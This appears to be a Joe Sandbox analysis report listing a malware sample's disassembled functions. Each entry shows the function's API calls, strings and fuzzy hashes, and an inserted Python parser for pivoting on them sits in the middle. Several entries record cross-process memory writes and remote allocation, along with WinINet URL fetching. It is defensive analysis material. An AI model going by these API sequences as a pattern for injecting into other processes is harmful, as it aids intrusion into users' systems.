• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 4247068974-0
• Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
• Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
• Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
• Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID: )$U$\
• API String ID: 0-3705770531
• Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
• Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
• Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
• Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 0046E505
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
• CoUninitialize.OLE32 ref: 0046E53D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
• Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
APIs
  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \$]$h
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
• Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
• GetWindowLongW.USER32(?,000000F0), ref: 0045087D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
• Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Opcode ID: 7462e7a4be706704e87074ba6d3187b11a665093027c485f5be76ba404333de2
• Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
• Opcode Fuzzy Hash: 7462e7a4be706704e87074ba6d3187b11a665093027c485f5be76ba404333de2
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
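Every entry in this disassembly section has the same fixed layout: an APIs list (each line is `Name.MODULE(args), ref: ADDR`, with the argument list sometimes absent, as in `GetMenuItemInfoW.USER32 ref: 0045FAC4`), a Strings list that may be empty, a Memory Dump Source block, the IDA plugin snapshot, and a Similarity block carrying the fuzzy hashes. The following is an added example, not part of the Joe Sandbox report or its tooling: a small Python parser that turns these summaries into records and pivots on them, here to list every function that pairs `LoadLibrary*` with `GetProcAddress` together with the export names it resolves, which is how the `AU3_GetPluginDetails` lookup above (the export name AutoIt3 resolves from plugin DLLs) surfaces from a long listing. The sample input is copied from this page's own entries with the extraction indentation removed; the `ApiCall`/`FunctionSummary` records and all function names are my own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: two function summaries copied from this report's
# disassembly section (bullets as rendered, indentation removed, lists trimmed).
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
"""

# One "• Name.MODULE(args), ref: ADDR" line. The argument list is optional
# (GetMenuItemInfoW above has none) and so is the comma before "ref".
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str


@dataclass
class FunctionSummary:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    source: dict = field(default_factory=dict)      # dump source + snapshot keys
    similarity: dict = field(default_factory=dict)  # API ID, String ID, hashes

    @property
    def entry_ref(self):
        # The first call site doubles as a stable label for the function.
        return self.apis[0].ref if self.apis else None


def parse_report(text):
    """Split the disassembly listing into one FunctionSummary per 'APIs' block."""
    summaries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if line == "APIs":  # every summary starts with its API list
                current = FunctionSummary()
                summaries.append(current)
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                current.apis.append(ApiCall(m["api"], m["module"], args, m["ref"]))
        elif section == "Strings":
            current.strings.append(line.lstrip("• ").strip())
        else:  # Memory Dump Source, Joe Sandbox IDA Plugin, Similarity: "• Key: Value"
            m = KV_RE.match(line)
            if m:
                target = current.similarity if section == "Similarity" else current.source
                target[m["key"].strip()] = m["value"].strip()
    return summaries


def dynamic_resolutions(summaries):
    """Functions that pair LoadLibrary* with GetProcAddress, and the names they resolve."""
    hits = []
    for s in summaries:
        names = {c.api for c in s.apis}
        if any(n.startswith("LoadLibrary") for n in names) and "GetProcAddress" in names:
            resolved = [c.args[1] for c in s.apis
                        if c.api == "GetProcAddress" and len(c.args) > 1 and c.args[1] != "?"]
            hits.append((s.entry_ref, resolved))
    return hits


def api_index(summaries):
    """Pivot table: API name -> sorted call-site addresses across all functions."""
    index = {}
    for s in summaries:
        for c in s.apis:
            index.setdefault(c.api, set()).add(c.ref)
    return {k: sorted(v) for k, v in index.items()}


if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    for ref, names in dynamic_resolutions(parsed):
        print(f"function @ {ref}: GetProcAddress resolves {names}")
    print(api_index(parsed))
```

Feed it the whole disassembly section of a report (pasted text or scraped HTML converted to lines) and `api_index` gives the pivot an analyst usually builds by hand: which call sites touch `GetProcAddress`, `SendMessageW` or WinINet, so the Instruction Fuzzy Hash of each interesting function can be compared against other samples.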
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
• Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
• Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
• Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
APIs
• DestroyWindow.USER32(00000000), ref: 00450A2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
• Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
• Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _memmove
• String ID: $<
• API String ID: 4104443479-428540627
• Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
• Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
• Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
• Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 1682464887-234962358
                                                                                                                                                                                                                                                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                                                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                                                                                                                                            Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
• Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D55C
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
• Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
• Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                                                                                                                                            • String ID: crts
                                                                                                                                                                                                                                                            • API String ID: 943502515-3724388283
                                                                                                                                                                                                                                                            • Opcode ID: 48bed912f23612092a912c5be4ce8918b0696bdd3f38560407ee328223f716d6
                                                                                                                                                                                                                                                            • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
